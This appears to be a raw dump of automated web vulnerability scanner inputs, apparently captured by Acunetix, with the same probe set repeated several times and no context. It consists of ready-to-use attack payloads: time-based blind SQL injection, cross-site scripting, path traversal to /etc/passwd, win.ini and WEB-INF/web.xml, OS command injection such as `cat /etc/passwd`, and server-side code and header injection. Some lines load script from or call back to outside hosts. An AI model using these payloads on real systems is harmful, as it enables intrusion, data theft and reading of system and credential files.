(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1

`cat /etc/passwd`

1<img/src=">" onerror=alert(969987)>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

|cat /etc/passwd#

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

-1

1<ScRiPt%20>prompt(917711)</sCripT>

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

'|'ld

1

1

)

1&n933531=v940941

1some_inexistent_file_with_long_name%00.jpg

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1&lt

-1)

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

"|"ld

!(()&&!|*|*|

1

\xf6<img acu onmouseover=prompt(998519) //\xf6>

/etc/passwd

'"()

1

1

testasp.vulnweb.com

-1))

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1<input autofocus onfocus=prompt(996778)>

^(#$!@#$)(()))******

0QUnKWDD'

'

1

1

1

'

<a href='http://www.acunetix.com'>website security</a>

1

1

1

"

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

xfvbI4YV')

http://testasp.vulnweb.com/t/xss.html?%00.jpg

"

1

1

[url=http://www.acunetix.com]website security[/url]

${@print(md5(acunetix_wvs_security_test))}

1

1

1

1

1_c5CwT <ScRiPt >prompt(951032)</ScRiPt>

||cat /etc/passwd

acunetix_wvs_invalid_filename

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

ZAp2xhjw'))

${@print(md5(acunetix_wvs_security_test))}\

1

1

http://hitSPKtgGTBXo.bxss.me/

1

&dir

1

1

1

comments

1

-1

1

1

1

'&dir&'

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

comments

-1)

'"

1

file:///etc/passwd

http://www.acunetix.tst

1

1

-1))

1

"&dir&"

comments/.

Vzv0S78o'

/\../\../\../\../\../\../\../etc/passwd

<!--

1'"()&%<ScRiPt >prompt(991898)</ScRiPt>

1

1

1

|dir

o7T2q1yd')

1

'"()&%<ScRiPt >prompt(936731)</ScRiPt>

1

WEB-INF/web.xml

1

'|dir

1

WG361nEO'))

1

1

1_957391

1

"|dir

1

WEB-INF\web.xml

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

../../../../../../../../../../boot.ini

1

1

1

acu3602\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca3602

../../../../../../../../../../windows/win.ini.jpg

1

acux3527\xc0\xbez1\xc0\xbcz2a\x90bcxuca3527

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(988790)</ScRiPt>

1

1

1

................windowswin.ini

1<script>prompt(922548)</script>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(924115)</ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?990177></ScRiPt>

1

1

1<ScRiPt >prompt(945559)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

response.write(9471390*9685782)

1<video><source onerror="javascript:prompt(934720)">

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

'+response.write(9471390*9685782)+'

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(907748)"></g></svg>

1

1

"+response.write(9471390*9685782)+"

1

WEB-INF/web.xml

1

1<div style=width:expression(prompt(978584))>

SomeCustomInjectedHeader:injected_by_wvs

&cat /etc/passwd&

1

../../../../../../../../../../etc/passwd

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<iframe src='data:text/html

WEB-INF\web.xml

1

${100108+100040}

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

'&cat /etc/passwd&'

1

1

1<body onload=prompt(966173)>

SomeCustomInjectedHeader:injected_by_wvs

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

../../../../../../../../../../etc/passwd.jpg

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(948971)>

"&cat /etc/passwd&"

1

1&n913206=v938272

1some_inexistent_file_with_long_name%00.jpg

)

1

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

cat /etc/passwd

1<img src=xyz OnErRor=prompt(994004)>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1

!(()&&!|*|*|

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

`cat /etc/passwd`

1<img/src=">" onerror=alert(950883)>

1

^(#$!@#$)(()))******

-1)

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

'"()

|cat /etc/passwd#

testasp.vulnweb.com

1

1

1

-1))

1

1<ScRiPt%20>prompt(942237)</sCripT>

'|'ld

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

1

1

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

"|"ld

1&lt

O9Fny7YH'

'

1

1

\xf6<img acu onmouseover=prompt(964652) //\xf6>

/etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

1

"

pRxT3reu')

1

1

1<input autofocus onfocus=prompt(996870)>

acunetix_wvs_invalid_filename

${@print(md5(acunetix_wvs_security_test))}

1

'

oJ9PTmke'))

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

http://hityFjXAbQkHE.bxss.me/

<a href='http://www.acunetix.com'>website security</a>

"

comments

1

${@print(md5(acunetix_wvs_security_test))}\

-1

1

[url=http://www.acunetix.com]website security[/url]

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

||cat /etc/passwd

-1)

1

'"

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1_Okw8Z <ScRiPt >prompt(901209)</ScRiPt>

http://www.acunetix.tst

-1))

1

comments/.

1

1

1

<!--

fjRssfSs'

1

1

1'"()&%<ScRiPt >prompt(915206)</ScRiPt>

1

1

&dir

1

1

file:///etc/passwd

1

'&dir&'

'"()&%<ScRiPt >prompt(965453)</ScRiPt>

1

1

r8WKrjPD')

1

1

/\../\../\../\../\../\../\../etc/passwd

"&dir&"

1_920141

1

0eJuylWW'))

1

WEB-INF/web.xml

1

|dir

1

1

'|dir

WEB-INF\web.xml

1

1

acu9764\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca9764

../../../../../../../../../../windows/win.ini

"|dir

1

acux4690\xc0\xbez1\xc0\xbcz2a\x90bcxuca4690

1

1<ScRiPt >prompt(960700)</ScRiPt>

../../../../../../../../../../boot.ini

1

1<script>prompt(969608)</script>

1

1

../../../../../../../../../../windows/win.ini.jpg

1<ScRiPt >prompt(902733)</ScRiPt>

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?934940></ScRiPt>

1

1

1

................windowswin.ini

1

1<ScRiPt >prompt(983296)</ScRiPt>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

response.write(9101523*9274712)

1<video><source onerror="javascript:prompt(997167)">

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(900683)"></g></svg>

'+response.write(9101523*9274712)+'

1

1

1

1<div style=width:expression(prompt(951714))>

"+response.write(9101523*9274712)+"

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<iframe src='data:text/html

SomeCustomInjectedHeader:injected_by_wvs

&cat /etc/passwd&

1

../../../../../../../../../../etc/passwd

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

'&cat /etc/passwd&'

1

1<body onload=prompt(922408)>

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1

"&cat /etc/passwd&"

../../../../../../../../../../etc/passwd.jpg

1

WEB-INF/web.xml

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(958573)>

${100048+99113}

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

cat /etc/passwd

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<img src=xyz OnErRor=prompt(963991)>

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

WEB-INF\web.xml

`cat /etc/passwd`

1

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1<img/src=">" onerror=alert(997233)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1some_inexistent_file_with_long_name%00.jpg

1

1

-1

|cat /etc/passwd#

/../..//../..//../..//../..//../..//etc/passwd.jpg

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1<ScRiPt%20>prompt(973900)</sCripT>

1&n981435=v938234

1

1

)

testasp.vulnweb.com

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1&lt

-1)

'|'ld

!(()&&!|*|*|

1

1

'"()

1

/etc/passwd

\xf6<img acu onmouseover=prompt(908199) //\xf6>

1

1

^(#$!@#$)(()))******

"|"ld

1

-1))

1<input autofocus onfocus=prompt(949983)>

1

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

'

1

<a href='http://www.acunetix.com'>website security</a>

273Q5UHY'

1

'

1

1

1

"

bW0KV9Hk')

[url=http://www.acunetix.com]website security[/url]

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

${@print(md5(acunetix_wvs_security_test))}

1

"

1

1

${@print(md5(acunetix_wvs_security_test))}\

W2mHGVjO'))

1

1_fl9M1 <ScRiPt >prompt(919826)</ScRiPt>

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

http://hitE0fsOCPaj4.bxss.me/

1

1

1

||cat /etc/passwd

1

-1

1

1

1

1

acunetix_wvs_invalid_filename

1

file:///etc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

&dir

1

-1)

1

/\../\../\../\../\../\../\../etc/passwd

1

http://www.acunetix.tst

1

comments

WEB-INF/web.xml

'"

'&dir&'

1

1

-1))

1

comments

1'"()&%<ScRiPt >prompt(968578)</ScRiPt>

<!--

AAam4jDU'

1

1

WEB-INF\web.xml

"&dir&"

'"()&%<ScRiPt >prompt(930475)</ScRiPt>

1

comments/.

1

mVTgxzrY')

../../../../../../../../../../windows/win.ini

|dir

1

1_997514

1

KoWeF6cs'))

1

../../../../../../../../../../boot.ini

1

'|dir

1

1

../../../../../../../../../../windows/win.ini.jpg

"|dir

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1

................windowswin.ini

1

1

acu6451\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca6451

1

1

acux3388\xc0\xbez1\xc0\xbcz2a\x90bcxuca3388

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt >prompt(930571)</ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<script>prompt(969064)</script>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt >prompt(995643)</ScRiPt>

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?949226></ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<ScRiPt >prompt(919805)</ScRiPt>

1

1

1

1<video><source onerror="javascript:prompt(984170)">

1

1

response.write(9324238*9616830)

WEB-INF/web.xml

1

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(937510)"></g></svg>

WEB-INF\web.xml

'+response.write(9324238*9616830)+'

1

1

1<div style=width:expression(prompt(958758))>

&cat /etc/passwd&

1

"+response.write(9324238*9616830)+"

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1<iframe src='data:text/html

SomeCustomInjectedHeader:injected_by_wvs

1

1

'&cat /etc/passwd&'

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

1<body onload=prompt(908978)>

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

"&cat /etc/passwd&"

1

if(now()=sysdate(),sleep(10.125),0)/*'XOR(if(now()=sysdate(),sleep(10.125),0))OR'"XOR(if(now()=sysdate(),sleep(10.125),0))OR"*/

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(988164)>

1

1

1

1

1

cat /etc/passwd

1<img src=xyz OnErRor=prompt(979002)>

../../../../../../../../../../etc/passwd.jpg

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

${99850+99658}

(select(0)from(select(sleep(3.375)))v)/*'+(select(0)from(select(sleep(3.375)))v)+'"+(select(0)from(select(sleep(3.375)))v)+"*/

1some_inexistent_file_with_long_name%00.jpg

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<img/src=">" onerror=alert(978371)>

`cat /etc/passwd`

1

1

1

-1

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

|cat /etc/passwd#

1

1<ScRiPt%20>prompt(994269)</sCripT>

-1)

1&n916366=v947032

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

)

testasp.vulnweb.com

-1))

1&lt

1

'|'ld

1

1

HQV2slG4'

1

!(()&&!|*|*|

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

kbmQBpFU')

"|"ld

\xf6<img acu onmouseover=prompt(986601) //\xf6>

/etc/passwd

1

^(#$!@#$)(()))******

1

1

1<input autofocus onfocus=prompt(916385)>

'"()

Deq7gyLg'))

1

'

1

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

'

1

<a href='http://www.acunetix.com'>website security</a>

-1

1

1

1

"

-1)

"

[url=http://www.acunetix.com]website security[/url]

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}

1

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1_S3nKK <ScRiPt >prompt(974051)</ScRiPt>

http://hitcznz0dXD4l.bxss.me/

||cat /etc/passwd

-1))

${@print(md5(acunetix_wvs_security_test))}\

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

acunetix_wvs_invalid_filename

1

1

DbmNCHoP'

1

1

&dir

1

1

1

file:///etc/passwd

comments

1

'"

http://www.acunetix.tst

1

teCENzwp')

'&dir&'

comments

1'"()&%<ScRiPt >prompt(997891)</ScRiPt>

/\../\../\../\../\../\../\../etc/passwd

1

<!--

"&dir&"

kRkPaFYE'))

1

1

1

1

1

WEB-INF/web.xml

'"()&%<ScRiPt >prompt(987712)</ScRiPt>

comments/.

1

|dir

1

1

WEB-INF\web.xml

1_907255

1

1

1

'|dir

../../../../../../../../../../windows/win.ini

1

1

"|dir

1

../../../../../../../../../../boot.ini

1

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

acu4398\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca4398

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

acux2944\xc0\xbez1\xc0\xbcz2a\x90bcxuca2944

1

1

................windowswin.ini

1

1<ScRiPt >prompt(926124)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<script>prompt(965680)</script>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1<ScRiPt >prompt(955315)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?984231></ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<ScRiPt >prompt(985316)</ScRiPt>

1

1

1<video><source onerror="javascript:prompt(974822)">

response.write(9464221*9207767)

1

1

WEB-INF/web.xml

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(999169)"></g></svg>

1

1

'+response.write(9464221*9207767)+'

1

1

WEB-INF\web.xml

1<div style=width:expression(prompt(920559))>

&cat /etc/passwd&

SomeCustomInjectedHeader:injected_by_wvs

1

"+response.write(9464221*9207767)+"

1

1

../../../../../../../../../../etc/passwd

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1<iframe src='data:text/html

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

1

1<body onload=prompt(924554)>

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

cat /etc/passwd

1

../../../../../../../../../../etc/passwd.jpg

${100267+99655}

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(943348)>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

`cat /etc/passwd`

1

1

-1

1&n967619=v941730

1some_inexistent_file_with_long_name%00.jpg

1<img src=xyz OnErRor=prompt(957006)>

|cat /etc/passwd#

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

)

1

'|'ld

1

-1)

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1<img/src=">" onerror=alert(945772)>

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

!(()&&!|*|*|

testasp.vulnweb.com

-1))

1

"|"ld

^(#$!@#$)(()))******

'"()

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1<ScRiPt%20>prompt(990918)</sCripT>

1

1

'

hnsJ9qGi'

1

/etc/passwd

1

1

1

1&lt

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

hezc9sPW')

"

'

1

1

1

1

bWzIsLWu'))

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

\xf6<img acu onmouseover=prompt(928714) //\xf6>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

"

${@print(md5(acunetix_wvs_security_test))}

1

1<input autofocus onfocus=prompt(936783)>

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

-1

1

${@print(md5(acunetix_wvs_security_test))}\

<a href='http://www.acunetix.com'>website security</a>

||cat /etc/passwd

http://hitnadR8Lxfom.bxss.me/

acunetix_wvs_invalid_filename

1

1

-1)

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

1

&dir

[url=http://www.acunetix.com]website security[/url]

comments

1

-1))

1

file:///etc/passwd

'&dir&'

1_JnfR2 <ScRiPt >prompt(959009)</ScRiPt>

1

'"

http://www.acunetix.tst

1'"()&%<ScRiPt >prompt(926444)</ScRiPt>

"&dir&"

/\../\../\../\../\../\../\../etc/passwd

LO1zC1RR'

comments

1

'"()&%<ScRiPt >prompt(941964)</ScRiPt>

1

<!--

1

comments/.

1

WEB-INF/web.xml

gpuXITGi')

|dir

1

1

1

1_937268

1

1

1

BXWSHL3i'))

WEB-INF\web.xml

1

1

1

1

'|dir

../../../../../../../../../../windows/win.ini

1

1

1

acu7977\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca7977

"|dir

../../../../../../../../../../boot.ini

1

acux5220\xc0\xbez1\xc0\xbcz2a\x90bcxuca5220

1

1

1

1

1

1<ScRiPt >prompt(996256)</ScRiPt>

../../../../../../../../../../windows/win.ini.jpg

1

1<script>prompt(978611)</script>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1<ScRiPt >prompt(957521)</ScRiPt>

................windowswin.ini

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?935159></ScRiPt>

1

1

1<ScRiPt >prompt(912818)</ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<video><source onerror="javascript:prompt(990763)">

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(910124)"></g></svg>

1

1

1

WEB-INF/web.xml

1

1<div style=width:expression(prompt(947380))>

1

response.write(9981633*9562306)

1

1<iframe src='data:text/html

1

WEB-INF\web.xml

'+response.write(9981633*9562306)+'

1

1

1

1

1<body onload=prompt(980624)>

&cat /etc/passwd&

1

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9981633*9562306)+"

../../../../../../../../../../etc/passwd

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(911384)>

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

'&cat /etc/passwd&'

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img src=xyz OnErRor=prompt(926793)>

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

"&cat /etc/passwd&"

../../../../../../../../../../etc/passwd.jpg

1

1<img/src=">" onerror=alert(903187)>

1

${99450+99212}

1

1

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1<ScRiPt%20>prompt(957104)</sCripT>

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

cat /etc/passwd

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1&lt

`cat /etc/passwd`

1&n954805=v977605

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1some_inexistent_file_with_long_name%00.jpg

1

\xf6<img acu onmouseover=prompt(951893) //\xf6>

-1

)

1

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

|cat /etc/passwd#

1<input autofocus onfocus=prompt(941660)>

1

!(()&&!|*|*|

-1)

1

testasp.vulnweb.com

'|'ld

<a href='http://www.acunetix.com'>website security</a>

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

-1))

^(#$!@#$)(()))******

'"()

1

/etc/passwd

1

[url=http://www.acunetix.com]website security[/url]

"|"ld

'

1

1

1

XFpTLM9o'

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1_DoVnx <ScRiPt >prompt(931100)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

"

1

1

'

1

1

m7LCA8VU')

1

${@print(md5(acunetix_wvs_security_test))}

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

http://hit7qT3n4FlML.bxss.me/

"

1

1

VfH8Kgax'))

1

1

acunetix_wvs_invalid_filename

${@print(md5(acunetix_wvs_security_test))}\

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

-1

1

1

||cat /etc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

http://www.acunetix.tst

comments

1

-1)

'"

1

comments

1

1'"()&%<ScRiPt >prompt(951738)</ScRiPt>

&dir

file:///etc/passwd

-1))

<!--

1

1

comments/.

'&dir&'

'"()&%<ScRiPt >prompt(920965)</ScRiPt>

1

/\../\../\../\../\../\../\../etc/passwd

1

1

NFd69vjf'

1

WEB-INF/web.xml

1

1_995122

"&dir&"

6Heft5Yl')

1

1

1

1

DhAiqhhb'))

1

WEB-INF\web.xml

1

|dir

1

acu10258\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca10258

1

1

../../../../../../../../../../windows/win.ini

'|dir

1

acux4079\xc0\xbez1\xc0\xbcz2a\x90bcxuca4079

1<ScRiPt >prompt(918385)</ScRiPt>

1

../../../../../../../../../../boot.ini

1<script>prompt(919694)</script>

"|dir

1

1<ScRiPt >prompt(983238)</ScRiPt>

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?967601></ScRiPt>

1

1<ScRiPt >prompt(932000)</ScRiPt>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<video><source onerror="javascript:prompt(925927)">

1

1

................windowswin.ini

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(953235)"></g></svg>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<div style=width:expression(prompt(943281))>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<iframe src='data:text/html

1

1

1<body onload=prompt(901306)>

response.write(9287069*9365339)

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

'+response.write(9287069*9365339)+'

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(990241)>

SomeCustomInjectedHeader:injected_by_wvs

&cat /etc/passwd&

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

../../../../../../../../../../etc/passwd

1<img src=xyz OnErRor=prompt(917704)>

"+response.write(9287069*9365339)+"

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

'&cat /etc/passwd&'

1

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd.jpg

1

1<img/src=">" onerror=alert(996848)>

1

WEB-INF/web.xml

